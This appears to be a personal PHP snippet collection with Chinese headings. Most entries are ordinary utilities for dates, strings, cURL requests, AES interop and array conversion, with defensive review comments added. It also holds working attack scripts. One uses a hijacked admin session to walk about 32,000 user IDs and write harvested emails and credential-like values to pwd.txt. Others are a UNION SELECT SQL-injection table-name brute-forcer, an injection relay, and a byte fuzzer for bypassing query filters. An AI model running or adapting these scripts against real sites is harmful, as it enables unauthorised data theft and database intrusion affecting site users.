#php 日期转换成TZ格式
// Current time as an ISO-8601 UTC timestamp with a literal "Z" suffix,
// e.g. 2020-07-21T12:11:11Z. gmdate() always formats in UTC, so the offset
// that 'c' would print ("+00:00") can be written as "Z" directly.
$time_tz_str = gmdate('Y-m-d\TH:i:s\Z');
#trim 移除字符串
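/**
 * Remove one leading and one trailing occurrence of $removestring from $string.
 *
 * The needle is treated as literal text. It is passed through preg_quote()
 * before being placed in the pattern, so characters such as ".", "*", "(" or
 * the "/" delimiter neither change the meaning of the pattern nor break it.
 * Without that step a caller-supplied needle is effectively a regular
 * expression, which is a pattern-injection risk when it comes from user input.
 *
 * @param mixed $string       Text to trim; non-strings are returned unchanged.
 * @param mixed $removestring Literal text to strip from both ends.
 * @return mixed The trimmed string, or $string unchanged when either argument
 *               is not a string.
 */
function strim($string, $removestring)
{
    if (!is_string($string) || !is_string($removestring)) {
        return $string;
    }

    $needle = preg_quote($removestring, '/');

    return preg_replace("/^{$needle}|{$needle}$/", '', $string);
}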
#这样改strim会更好一点 function strim($string,$removestring=''){ if (!is_string($string)){ return $string; } if (!$removestring){ return trim($string); } $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string); return $result; }
#curl request
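/**
 * Send an HTTP(S) request with cURL and return the response.
 *
 * @param string       $url          Target URL.
 * @param string|array $post         Request body. When non-empty the request is sent as
 *                                   POST; the value is handed to cURL as given (a string is
 *                                   sent verbatim, an array is sent as multipart/form-data).
 * @param string       $cookie       Raw Cookie header value to send, if any.
 * @param int          $returnCookie When truthy, response headers are captured and the
 *                                   first Set-Cookie name=value pair is returned with the body.
 * @return string|array The response body; or ['cookie' => string, 'content' => string]
 *                      when $returnCookie is set; or the cURL error message on failure
 *                      (kept for compatibility - callers cannot tell it from a body).
 */
function curl_request($url, $post = '', $cookie = '', $returnCookie = 0)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");

    if ($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    }
    if ($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }

    curl_setopt($curl, CURLOPT_HEADER, (bool) $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

    // HTTPS works without touching these options. Turning verification off
    // only removes the protection against a man-in-the-middle reading or
    // altering the cookies and bodies this function carries. Verify both the
    // certificate chain and that the certificate matches the host name; if a
    // private CA is in use, point CURLOPT_CAINFO at its bundle instead.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);

    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        $error = curl_error($curl);
        curl_close($curl); // release the handle on the failure path too
        return $error;
    }

    // With redirects followed, the response starts with one header block per
    // hop, so splitting on the first blank line would leave later header
    // blocks in the "body". cURL reports the combined header length.
    $headerSize = (int) curl_getinfo($curl, CURLINFO_HEADER_SIZE);
    curl_close($curl);

    if (!$returnCookie) {
        return $data;
    }

    $header = (string) substr($data, 0, $headerSize);
    $info = array(
        'cookie'  => '',
        'content' => (string) substr($data, $headerSize),
    );

    // Header names are case-insensitive, and a cookie without attributes has
    // no trailing ";", so match up to the first ";" or the end of the line.
    if (preg_match('/^Set-Cookie:\s*([^;\r\n]*)/mi', $header, $match)) {
        $info['cookie'] = trim($match[1]);
    }

    return $info;
}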
#php remove bom str
/**
 * Strip a leading UTF-8 byte-order mark (bytes EF BB BF) from $str.
 *
 * @param string $str Input text.
 * @return string $str without the BOM, or $str unchanged when it has none.
 */
function str_remove_bom($str)
{
    $bom = "\xEF\xBB\xBF";

    if (strncmp($str, $bom, 3) !== 0) {
        return $str;
    }

    return substr($str, 3);
}
#php实现内存地址反转
/**
 * Reverse the byte order of a hex string, e.g. to switch a dumped address
 * between little- and big-endian notation.
 *
 * The input is cut into two-character groups (one byte each) and the groups
 * are joined back in reverse order; the characters inside a group keep their
 * order.
 *
 * @param string $hex Hex digits.
 * @return string The same byte groups in reverse order.
 */
function array_endtostart($hex)
{
    return implode('', array_reverse(str_split($hex, 2)));
}
#php 实现汇编中的pxor
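/**
 * Byte-wise XOR of two hex strings (the page describes it as the equivalent
 * of the assembly "pxor" instruction).
 *
 * Both operands are validated first. The original indexed $b by the position
 * in $a, so a shorter $b produced an undefined-offset read and passed null to
 * hex2bin(), and odd-length or non-hex input produced warnings and garbage.
 * PHP's XOR on two strings works byte by byte and stops at the shorter
 * operand, so the result has the length of the shorter input.
 *
 * @param string $a Hex digits, even length.
 * @param string $b Hex digits, even length.
 * @return string Lower-case hex of the XOR over the common length.
 * @throws InvalidArgumentException When an operand is not an even-length hex string.
 */
function xortnew($a, $b)
{
    foreach (array($a, $b) as $operand) {
        $isHex = is_string($operand)
            && strlen($operand) % 2 === 0
            && ($operand === '' || ctype_xdigit($operand));
        if (!$isHex) {
            throw new InvalidArgumentException('xortnew() expects even-length hex strings');
        }
    }

    return bin2hex(hex2bin($a) ^ hex2bin($b));
}

var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));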
#php 查找字符串与替换
/**
 * Rewrite selected characters inside the <pre>...</pre> part of $str and
 * return the resulting string.
 *
 * NOTE(review): the replacement strings below look damaged by extraction.
 * Three calls replace a character with itself, and the double-quote call
 * reads """ which is not valid PHP as shown. Presumably each replacement was
 * an HTML entity for the matched character; confirm against the original
 * before using this function.
 *
 * @param string $str Text that may contain a <pre> block.
 * @return string|null Result of preg_replace_callback().
 */
function tapreplace($str){
    // The "s" modifier lets "." cross newlines. ".*" is greedy, so a single
    // match runs from the first "<pre" to the last "</pre>" in $str.
    $newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){
        // Tab to a single space (as shown on the page).
        $text=preg_replace("/\t/"," ",$match[0]);
        $text=preg_replace("/'/","'",$text);
        $text=preg_replace("/#/","#",$text);
        $text=preg_replace("/\"/",""",$text);
        $text=preg_replace("/'/","'",$text);
        return $text;
    },$str);
    return $newstr;
}
#dokuwiki在php7下报operator not supported for strings in 错
inc\lessc.inc.php
public $importDir = ''; #改为 public $importDir = array();
#CryptoJS 与php互通
# In CryptoJS
# NOTE(review): with a WordArray key and an explicit iv, CryptoJS.AES uses CBC
# with PKCS#7 padding by default and the key length selects AES-128/192/256,
# which is why the PHP side below names aes-128-cbc / aes-192-cbc / aes-256-cbc.
# NOTE(review): CBC gives confidentiality only. Nothing here detects a
# modified ciphertext, so a receiver that reports padding errors can be used
# as a padding oracle. Add an HMAC over iv + ciphertext (checked with
# hash_equals() before decrypting) or use an authenticated mode on both sides.
# NOTE(review): the snippet does not show how key and iv reach PHP. The iv can
# travel with the ciphertext; the key must not, and a fresh iv is needed per
# message.
# 128-bit AES encryption
var key = CryptoJS.lib.WordArray.random(16);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
# 'xxxxxxx' / "xxxxx" are placeholders for the hex key, hex iv and ciphertext.
# The fourth argument is the integer $options; false is coerced to 0, meaning
# base64 input with padding removed. NOTE(review): a key of the wrong byte
# length is not rejected by openssl_decrypt(), so check strlen($key_str)
# against the cipher name - confirm on the target PHP version.
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);
#192 aes
var key = CryptoJS.lib.WordArray.random(24);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);
#256 aes:
var key = CryptoJS.lib.WordArray.random(32);
var iv = CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
$key_str = hex2bin('xxxxxxx');
$iv_str = hex2bin('xxxxxxx');
$str="xxxxx";
$result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);
#php try catch warning
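// Turn PHP warnings and notices into ErrorException so they can be handled
// with try/catch.
//
// The handler takes four parameters. PHP 8 no longer passes the fifth
// ($errcontext), so a handler that requires it fails with ArgumentCountError
// on the first warning; PHP 7 still passes it and the extra argument is
// simply ignored here.
set_error_handler(function ($errno, $errstr, $errfile = '', $errline = 0) {
    // Respect error_reporting and the @-operator. On PHP 8 a suppressed
    // error no longer makes error_reporting() return 0, so test the bit for
    // this error level instead of comparing with 0.
    if (!(error_reporting() & $errno)) {
        return false;
    }
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});

# After that a plain try/catch is enough
try {
    // $rule is used as a regular expression as-is. If rules can come from
    // outside the application, an invalid pattern lands in the catch below,
    // but a pathological one can still consume CPU up to pcre.backtrack_limit;
    // validate or length-limit rules where they are accepted.
    if (preg_match("/{$rule}/", $result['url'])) {
        $end['match']=1;
        $end['code_error']=0;
    }
    if ($result['code'] == 404) {
        $end['code_error']=1;
    }
} catch (Exception $e) {
    // Debug output of the offending rule; log it instead of printing it in
    // anything that serves responses.
    var_dump($rule);
}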
#数组对象转换
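/**
 * Convert an array to an object, recursing into nested arrays.
 *
 * Nested objects are kept as they are. The original passed them back into
 * this function, which rejects non-arrays and returns null, so every nested
 * object was replaced by an empty stdClass and its data was lost.
 *
 * @param array $arr Array to convert.
 * @return object|null stdClass built from $arr, or null when $arr is not an array.
 */
function array_to_object($arr)
{
    if (!is_array($arr)) {
        return null;
    }

    foreach ($arr as $k => $v) {
        if (is_array($v)) {
            $arr[$k] = array_to_object($v);
        }
    }

    return (object) $arr;
}

/**
 * Convert an object to an array, recursing into nested objects and arrays.
 *
 * The (array) cast exposes non-public properties too, under keys that carry
 * NUL-prefixed class markers, so the result can contain more than the
 * object's public interface. If any value at the current level is an open
 * resource the function gives up and returns null; inside a recursion that
 * null is cast to an empty array.
 *
 * @param object|array $obj Object (or array) to convert.
 * @return array|null The converted array, or null when a resource is found
 *                    at the top level.
 */
function object_to_array($obj)
{
    $obj = (array) $obj;

    foreach ($obj as $k => $v) {
        if (is_resource($v)) {
            return null;
        }
        if (is_object($v) || is_array($v)) {
            $obj[$k] = (array) object_to_array($v);
        }
    }

    return $obj;
}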
#一个无极限分类
/**
 * Build a nested tree from a flat list of rows.
 *
 * Each row is read for 'pid' (parent id) and 'pro_id' (own id). A row whose
 * 'pid' exists as a key of $result is appended by reference to that parent's
 * 'son' list; every other row becomes a root of the returned tree.
 *
 * NOTE(review): the lookups index $result by $item['pid'] and
 * $item['pro_id'], so $result is presumably keyed by pro_id - confirm at the
 * caller. The references are what let children attached later show up inside
 * entries that were linked earlier.
 *
 * @param array $result Rows with 'pid' and 'pro_id'.
 * @return array Root rows, each with its descendants under 'son'.
 */
function get_tree($result){
    $tree = array();
    foreach($result as $item){
        if(isset($result[$item['pid']])){
            $result[$item['pid']]['son'][] = &$result[$item['pro_id']];
        }else{
            $tree[] = &$result[$item['pro_id']];
        }
    }
    return $tree;
}
// Builds the unlimited-depth category data
// Displays the processed data recursively
/**
 * Print the tree built above, one name per line, indented by depth.
 *
 * NOTE(review): 'pro_name' is echoed into HTML without escaping. If names can
 * contain user-supplied text, wrap the value in htmlspecialchars() at this
 * point.
 *
 * @param array $data  Nodes with 'pro_name' and optionally 'son'.
 * @param int   $level Current depth; controls the indent.
 */
function getviewdata($data,$level=0){
    foreach($data as $key=>$value){
        // One indent unit per level, plus one.
        for($i=0;$i<=$level;$i++){
            echo '  ';
        }
        echo $value['pro_name'];
        echo '<br>';
        if(!empty($value['son'])){
            getviewdata($value['son'],$level+1);
        }
    }
}
// $xx is not defined in this snippet; it stands for the tree to display.
getviewdata($xx);
#某脱库脚本
// What this script shows, read from the defending side:
//  - Every request carries one fixed PHPSESSID, and the only thing that
//    changes is the uid in the path. The admin pages therefore appear to
//    return any account's records to whoever holds one valid session.
//    Per-record authorization and re-authentication for admin views are the
//    controls to check.
//  - The value the script calls $pwd is read out of an HTML table cell.
//    Presumably the application displays a credential-like value in clear;
//    confirm, and store such values hashed rather than rendering them.
//  - Detection: a single session walking uid values upward one by one with a
//    constant user agent and referer is easy to alert on; rate limits and
//    session binding (expiry, IP/device) narrow the window.

/**
 * Fetch the order list page for user id $i and pull values out of its table.
 *
 * @param int $i User id placed in the URL path.
 * @return array Empty array when nothing matched; otherwise
 *               ['email' => last captured link text, 'pid' => unique values
 *               captured from the third cell of each matching row].
 */
function getuidinfo($i){
    sleep(0.5);
    $url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
    curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
    // Fixed session identifier sent with every request.
    curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
    $output = curl_exec($ch);
    curl_close($ch);
    // Keep only the <tbody> part of the page.
    preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
    if(!isset($result[0][0]) || !$result[0][0]){
        return array();
    }
    $tmp_array= explode("\n",$result[0][0]);
    if(!$tmp_array){
        return array();
    }
    $result_out=array();
    foreach ($tmp_array as $a_tmp){
        $a_tmp = trim($a_tmp);
        // Only lines that start with a numeric first cell are data rows.
        if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
            continue;
        }
        // Capture 1: third cell; capture 2: text of the link in the last matched cell.
        preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
        $result_out[]=$a_result[1];
        $account_name = $a_result['2'];
    }
    if (!isset($account_name)){
        return array();
    }
    $result_out=array_unique($result_out);
    $return['email']=$account_name;
    $return['pid']=$result_out;
    return $return;
}

/**
 * Fetch the user search page for $product_id and return one table cell.
 *
 * @param string $product_id Value placed in the keyword query parameter.
 * @return array|string Empty array when nothing matched; otherwise the fourth
 *                      cell of the last matching row.
 */
function getproduct($product_id){
    sleep(0.5);
    $url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
    curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
    curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
    $output = curl_exec($ch);
    curl_close($ch);
    preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
    if(!isset($result[0][0]) || !$result[0][0]){
        return array();
    }
    $tmp_array= explode("\n",$result[0][0]);
    if(!$tmp_array){
        return array();
    }
    $result=array();
    foreach ($tmp_array as $a_tmp){
        $a_tmp = trim($a_tmp);
        if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
            continue;
        }
        preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
        // Overwrites on every row, so the last matching row wins.
        $result=$a_result[1];
    }
    if(!$result){
        return array();
    }
    return $result;
}

// Driver: walks uid 1..32166 and appends one line per uid that returned data
// to pwd.txt (flag 8 is FILE_APPEND).
for($i=1;$i<32167;$i++){
    $uidinfo = getuidinfo($i);
    if(!$uidinfo){
        continue;
    }
    echo $i."\n";
    $strs = "uid:{$i} email:".$uidinfo['email'].":";
    $pwd_tmp=array();
    foreach($uidinfo['pid'] as $pid){
        $pwd = getproduct($pid);
        if(!$pwd){
            continue;
        }
        $pwd_tmp[]=$pwd;
    }
    $pwd_tmp=array_unique($pwd_tmp);
    $pwd_str =implode("|",$pwd_tmp);
    $strs .=$pwd_str."\n";
    file_put_contents("pwd.txt",$strs,8);
    sleep(0.5);
}
#thinkphp路由模式
http://www.xxx.net/product/index/xxx/id/29192 => http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192
#跑表名
// Reads candidate names from the local file "tables" and requests one URL per
// name, with SQL text appended to the id segment of the route. A response
// that does not contain the word "exist" is printed as a hit.
//
// Read from the defending side:
//  - The id route segment apparently reaches a SQL statement without being
//    bound as a parameter or cast to an integer (inferred from the request
//    shape); that is the defect to fix in the application.
//  - The check depends on the response text, presumably a database error such
//    as "table ... doesn't exist" being shown to the client. Returning a
//    generic error page removes that signal.
//  - Detection: request paths containing "union select" and a sub-select,
//    repeated about every two seconds from one session with only the table
//    name changing.
set_time_limit(0);
$tables = file("tables");
foreach ($tables as $a_tables){
    $a_tables = trim($a_tables);
    $url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
    $output = curl_exec($ch);
    curl_close($ch);
    // strstr() returns false when "exist" is absent from the response.
    $garbage = strstr($output, "exist");
    if($garbage == false) {
        echo $a_tables."<br>";
    }
    sleep(2);
}
#inject
// Takes the local "id" query parameter, places it in the id segment of a
// remote URL after "and 1=", fetches that URL with a fixed session cookie and
// prints the response.
//
// NOTE(review): $_GET['id'] is forwarded without validation and the remote
// body is printed without escaping, so the page that hosts this snippet
// relays arbitrary input and reflects arbitrary markup. On the receiving
// application the fix is the same as for any SQL injection: bind the id as a
// parameter or cast it to an integer before it reaches the query.
$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
#fuzz1
<?php
// Local experiment against a MySQL server on localhost: for every pair of
// byte values 0..254 it places the two bytes between the quoted identifiers
// `information_schema` and `SCHEMATA`, runs the query, and prints the pairs
// for which the count comes back as 10 (presumably the number of schemata on
// the author's test server - confirm before reusing the check).
//
// Defensive use: the printed pairs are byte sequences the SQL parser accepts
// where a "." is normally written. Input filters and WAF signatures that look
// for the literal text "information_schema." can be checked against them.
//
// NOTE(review): root with the password "123456" is hard-coded; keep this to a
// throwaway lab instance. mysqli_connect_errno() is declared without
// parameters, so passing $con fails on PHP 8. The loop bound "< 255" leaves
// byte 255 untested. "@" hides the warning when mysqli_query() returns false
// on PHP 7; on PHP 8 a false result or the default exception mode of mysqli
// stops the loop instead - confirm on the PHP version in use.
$con=mysqli_connect("localhost","root","123456","test");
if (mysqli_connect_errno($con)) {
    echo 111;
    exit;
}
for($i=0;$i<255;$i++) {
    for($j=0;$j<255;$j++) {
        $char_str = chr($i);
        $charj_str = chr($j);
        $strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
        $result=mysqli_query($con,$strs);
        $posts = array();
        while($row = @mysqli_fetch_array($result)) {
            $posts[] = $row;
        }
        if(isset($posts[0]) && $posts[0][0]==10 ){
            echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
        }
    }
}
mysqli_close($con);
#毫秒
// microtime() without arguments returns "<fraction> <seconds>", for example
// "0.12345600 1595333471". $lusec is the millisecond part of the current
// second, zero-padded to three digits.
[$usec, $sec] = explode(' ', microtime());
$milliseconds = (int) ($usec * 1000);
$lusec = str_pad((string) $milliseconds, 3, '0', STR_PAD_LEFT);